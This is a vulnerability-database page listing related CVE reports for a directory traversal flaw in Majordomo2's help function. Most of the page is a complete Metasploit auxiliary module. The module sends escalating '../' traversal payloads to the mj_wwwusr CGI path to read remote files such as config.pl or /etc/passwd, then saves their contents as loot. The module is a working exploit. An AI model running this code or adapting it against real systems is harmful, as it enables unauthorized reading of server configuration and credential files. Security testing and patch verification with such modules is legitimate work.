Majordomo2 _list_file_get() Directory Traversal

🗓️ 01 Sep 2024 00:00:00Reported by Jay Turla, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 204 Views

Majordomo2 _list_file_get() Directory Traversal vulnerability in Majordomo2 (help function) allows unauthorized access to files.

Reporter	Title	Published	Views	Family All 32
0day.today	Majordomo2 - Directory Traversal (SMTP/HTTP)	3 Feb 201100:00	–	zdt
Circl	CVE-2011-0049	3 Feb 201100:00	–	circl
Circl	CVE-2011-0063	3 Feb 201100:00	–	circl
CVE	CVE-2011-0049	4 Feb 201100:00	–	cve
CVE	CVE-2011-0063	15 Mar 201117:00	–	cve
Cvelist	CVE-2011-0049	4 Feb 201100:00	–	cvelist
Cvelist	CVE-2011-0063	15 Mar 201117:00	–	cvelist
d2	DSquare Exploit Pack: D2SEC_MAJORDOMO	4 Feb 201101:00	–	d2
d2	DSquare Exploit Pack: D2SEC_MAJORDOMO2	15 Mar 201117:55	–	d2
Dsquare	Majordomo 2 File Disclosure	27 Apr 201200:00	–	dsquare

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Majordomo2 _list_file_get() Directory Traversal',  
'Description' => %q{  
This module exploits a directory traversal vulnerability present in  
the _list_file_get() function of Majordomo2 (help function). By default, this  
module will attempt to download the Majordomo config.pl file.  
},  
'Author' => ['Nikolas Sotiriu'],  
'References' =>  
[  
['OSVDB', '70762'],  
['CVE', '2011-0049'],  
['CVE', '2011-0063'],  
['URL', 'https://www.sotiriu.de/adv/NSOADV-2011-003.txt'],  
['EDB', '16103']  
],  
'DisclosureDate' => 'Mar 08 2011',  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", 'config.pl']),  
OptString.new('URI', [true, 'Majordomo vulnerable URI path', '/cgi-bin/mj_wwwusr/domain=domain?user=&passw=&func=help&extra=']),  
OptInt.new('DEPTH', [true, 'Define the max traversal depth', 8]),  
])  
end  
  
def run_host(ip)  
trav_strings = [  
'../',  
'./.../'  
]  
uri = normalize_uri(datastore['URI'])  
file = datastore['FILE']  
deep = datastore['DEPTH']  
file = file.gsub(/^\//, "")  
  
trav_strings.each do |trav|  
str = ""  
i = 1  
while (i <= deep)  
str = trav * i  
payload = "#{str}#{file}"  
  
res = send_request_raw(  
{  
'method' => 'GET',  
'uri' => uri + payload,  
}, 25)  
  
if res.nil?  
print_error("#{rhost}:#{rport} Connection timed out")  
return  
end  
  
print_status("#{rhost}:#{rport} Trying URL " + payload )  
  
if (res and res.code == 200 and res.body)  
if res.body.match(/\<html\>(.*)\<\/html\>/im)  
html = $1  
  
if res.body =~ /unknowntopic/  
print_error("#{rhost}:#{rport} Could not retrieve the file")  
else  
file_data = html.gsub(%r{(.*)<pre>|<\/pre>(.*)}m, '')  
print_good("#{rhost}:#{rport} Successfully retrieved #{file} and storing as loot...")  
  
# Transform HTML entities back to the original characters  
file_data = file_data.gsub(/\&gt\;/i, '>').gsub(/\&lt\;/i, '<').gsub(/\&quot\;/i, '"')  
  
store_loot("majordomo2.traversal.file", "application/octet-stream", rhost, file_data, file)  
return  
end  
else  
print_error("#{rhost}:#{rport} No HTML was returned")  
end  
else  
# if res is nil, we hit this  
print_error("#{rhost}:#{rport} Unrecognized #{res.code} response")  
end  
i += 1;  
end  
end  
  
print_error("#{rhost}:#{rport} Not vulnerable or the DEPTH setting was too low")  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
rescue ::Timeout::Error, ::Errno::EPIPE  
end  
end  
`

01 Sep 2024 00:00Current

7High risk

Vulners AI Score7

CVSS 25

EPSS0.90582